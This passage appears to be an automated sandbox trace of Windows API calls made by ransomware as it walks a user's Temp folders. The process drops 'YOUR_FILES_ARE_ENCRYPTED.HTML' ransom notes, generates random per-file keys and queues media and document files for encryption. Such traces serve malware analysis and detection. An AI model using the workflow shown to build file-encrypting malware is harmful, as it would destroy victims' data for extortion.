lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py\\3.8\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa8d7880, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaa8d7880, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaa8d7880, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0164.182] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa8d7880, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaa8d7880, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaa8d7880, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0164.182] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa8d7880, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaa8d7880, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaa8d7880, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0xa, dwReserved0=0x0, dwReserved1=0x60, cFileName="dicts.dat", cAlternateFileName="")) returned 1 [0164.183] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py\\3.8\\dicts.dat") returned 63 [0164.183] lstrcmpW (lpString1="dicts.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.183] PathFindExtensionW (pszPath="dicts.dat") returned=".dat" [0164.183] lstrlenW (lpString=".dat") returned 4 [0164.183] PathFindExtensionW (pszPath="dicts.dat") returned=".dat" [0164.183] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0164.183] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py\\3.8\\dicts.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\gen_py\\3.8\\dicts.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0164.184] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=10) returned 1 [0164.184] CloseHandle (hObject=0x58c) returned 1 [0164.184] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa8d7880, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaa8d7880, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaa8d7880, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0xb0, dwReserved0=0x0, dwReserved1=0x60, cFileName="__init__.py", cAlternateFileName="")) returned 1 [0164.184] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py\\3.8\\__init__.py") returned 65 [0164.184] lstrcmpW (lpString1="__init__.py", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.184] PathFindExtensionW (pszPath="__init__.py") returned=".py" [0164.184] lstrlenW (lpString=".py") returned 3 [0164.184] PathFindExtensionW (pszPath="__init__.py") returned=".py" [0164.184] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0164.185] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py\\3.8\\__init__.py" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\gen_py\\3.8\\__init__.py"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0164.185] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=176) returned 1 [0164.185] CloseHandle (hObject=0x58c) returned 1 [0164.186] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa8d7880, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaa8d7880, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaa8d7880, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0xb0, dwReserved0=0x0, dwReserved1=0x60, cFileName="__init__.py", cAlternateFileName="")) returned 0 [0164.186] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0164.186] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py\\3.8\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 83 [0164.186] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py\\3.8\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\gen_py\\3.8\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0164.199] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0164.201] CloseHandle (hObject=0x5ac) returned 1 [0164.201] GetProcessHeap () returned 0x270000 [0164.202] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0164.203] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa8d7880, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaa8d7880, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaa8d7880, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.8", cAlternateFileName="")) returned 0 [0164.203] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0164.203] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 79 [0164.203] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\gen_py\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b0 [0164.203] WriteFile (in: hFile=0x5b0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0164.205] CloseHandle (hObject=0x5b0) returned 1 [0164.206] GetProcessHeap () returned 0x270000 [0164.207] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74081a0 | out: hHeap=0x270000) returned 1 [0164.207] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc3ab2b60, ftCreationTime.dwHighDateTime=0x1d7df33, ftLastAccessTime.dwLowDateTime=0xfa97f250, ftLastAccessTime.dwHighDateTime=0x1d7e6b5, ftLastWriteTime.dwLowDateTime=0xfa97f250, ftLastWriteTime.dwHighDateTime=0x1d7e6b5, nFileSizeHigh=0x0, nFileSizeLow=0x5c0b, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="JSCuyISn4Ff.swf", cAlternateFileName="JSCUYI~1.SWF")) returned 1 [0164.207] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\JSCuyISn4Ff.swf") returned 58 [0164.207] lstrcmpW (lpString1="JSCuyISn4Ff.swf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.207] PathFindExtensionW (pszPath="JSCuyISn4Ff.swf") returned=".swf" [0164.207] lstrlenW (lpString=".swf") returned 4 [0164.207] PathFindExtensionW (pszPath="JSCuyISn4Ff.swf") returned=".swf" [0164.207] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaad28060, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaad28060, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaad28060, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="Low", cAlternateFileName="")) returned 1 [0164.207] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Low") returned 46 [0164.207] GetProcessHeap () returned 0x270000 [0164.207] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74081a0 [0164.207] lstrcpyW (in: lpString1=0x74081a0, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Low" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Low") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Low" [0164.207] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Low", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Low\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Low\\*" [0164.207] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Low\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaad28060, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaad28060, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaad28060, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0164.208] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaad28060, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaad28060, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaad28060, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0164.208] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaad28060, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaad28060, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaad28060, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0164.208] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0164.208] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Low\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 76 [0164.208] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Low\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\low\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b0 [0164.209] WriteFile (in: hFile=0x5b0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0164.211] CloseHandle (hObject=0x5b0) returned 1 [0164.211] GetProcessHeap () returned 0x270000 [0164.212] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74081a0 | out: hHeap=0x270000) returned 1 [0164.212] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x589ebc90, ftCreationTime.dwHighDateTime=0x1d7d909, ftLastAccessTime.dwLowDateTime=0xd2c855a0, ftLastAccessTime.dwHighDateTime=0x1d7e3b1, ftLastWriteTime.dwLowDateTime=0xd2c855a0, ftLastWriteTime.dwHighDateTime=0x1d7e3b1, nFileSizeHigh=0x0, nFileSizeLow=0x92ba, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="lVFpx_ytKv.mp3", cAlternateFileName="LVFPX_~1.MP3")) returned 1 [0164.212] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\lVFpx_ytKv.mp3") returned 57 [0164.212] lstrcmpW (lpString1="lVFpx_ytKv.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.212] PathFindExtensionW (pszPath="lVFpx_ytKv.mp3") returned=".mp3" [0164.212] lstrlenW (lpString=".mp3") returned 4 [0164.212] PathFindExtensionW (pszPath="lVFpx_ytKv.mp3") returned=".mp3" [0164.212] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.212] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\lVFpx_ytKv.mp3" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\lvfpx_ytkv.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0164.213] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=37562) returned 1 [0164.213] GetProcessHeap () returned 0x270000 [0164.213] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x744a1c0 [0164.215] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="D0") returned 2 [0164.215] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="10") returned 2 [0164.215] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="4A") returned 2 [0164.215] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="60") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="F2") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="74") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="A0") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="B7") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="A5") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="9E") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="F8") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="CF") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="B8") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="A3") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="CC") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="4B") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="C1") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="29") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="7B") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="F4") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="46") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="AC") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="C8") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="4F") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="4D") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="83") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="68") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="EC") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="08") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="A3") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="A8") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="70") returned 2 [0164.217] lstrcpyW (in: lpString1=0x745a274, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\lVFpx_ytKv.mp3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\lVFpx_ytKv.mp3") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\lVFpx_ytKv.mp3" [0164.217] CreateIoCompletionPort (FileHandle=0x5b0, ExistingCompletionPort=0x3a0, CompletionKey=0x744a1c0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.217] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x744a1c0, lpOverlapped=0x744a1c0) returned 1 [0164.217] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x350304f0, ftCreationTime.dwHighDateTime=0x1d7d8cb, ftLastAccessTime.dwLowDateTime=0x6e812a90, ftLastAccessTime.dwHighDateTime=0x1d7daba, ftLastWriteTime.dwLowDateTime=0x6e812a90, ftLastWriteTime.dwHighDateTime=0x1d7daba, nFileSizeHigh=0x0, nFileSizeLow=0x100e4, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="MNGTh.pps", cAlternateFileName="")) returned 1 [0164.217] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\MNGTh.pps") returned 52 [0164.217] lstrcmpW (lpString1="MNGTh.pps", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.217] PathFindExtensionW (pszPath="MNGTh.pps") returned=".pps" [0164.217] lstrlenW (lpString=".pps") returned 4 [0164.217] PathFindExtensionW (pszPath="MNGTh.pps") returned=".pps" [0164.217] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.217] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\MNGTh.pps" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\mngth.pps"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0164.218] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=65764) returned 1 [0164.218] GetProcessHeap () returned 0x270000 [0164.218] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7472318 [0164.220] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="86") returned 2 [0164.220] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="35") returned 2 [0164.220] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="67") returned 2 [0164.220] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="5D") returned 2 [0164.220] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="98") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="0E") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="82") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="58") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="0A") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="EA") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="8D") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="39") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="61") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="A5") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="C6") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="C0") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="D4") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="C1") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="99") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="0B") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="FE") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="68") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="C6") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="72") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="A1") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="12") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="D9") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="75") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="14") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="C0") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="D5") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="31") returned 2 [0164.222] lstrcpyW (in: lpString1=0x74823cc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\MNGTh.pps" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\MNGTh.pps") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\MNGTh.pps" [0164.222] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x7472318, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.222] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7472318, lpOverlapped=0x7472318) returned 1 [0164.222] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdc761e30, ftCreationTime.dwHighDateTime=0x1d7d82f, ftLastAccessTime.dwLowDateTime=0x24467090, ftLastAccessTime.dwHighDateTime=0x1d7d9f5, ftLastWriteTime.dwLowDateTime=0x24467090, ftLastWriteTime.dwHighDateTime=0x1d7d9f5, nFileSizeHigh=0x0, nFileSizeLow=0xb0c2, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="Mqc9Q8Qugqo7NNB 4E9u.m4a", cAlternateFileName="MQC9Q8~1.M4A")) returned 1 [0164.222] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Mqc9Q8Qugqo7NNB 4E9u.m4a") returned 67 [0164.222] lstrcmpW (lpString1="Mqc9Q8Qugqo7NNB 4E9u.m4a", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.222] PathFindExtensionW (pszPath="Mqc9Q8Qugqo7NNB 4E9u.m4a") returned=".m4a" [0164.222] lstrlenW (lpString=".m4a") returned 4 [0164.222] PathFindExtensionW (pszPath="Mqc9Q8Qugqo7NNB 4E9u.m4a") returned=".m4a" [0164.222] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.222] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Mqc9Q8Qugqo7NNB 4E9u.m4a" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\mqc9q8qugqo7nnb 4e9u.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0164.223] GetFileSizeEx (in: hFile=0x58c, 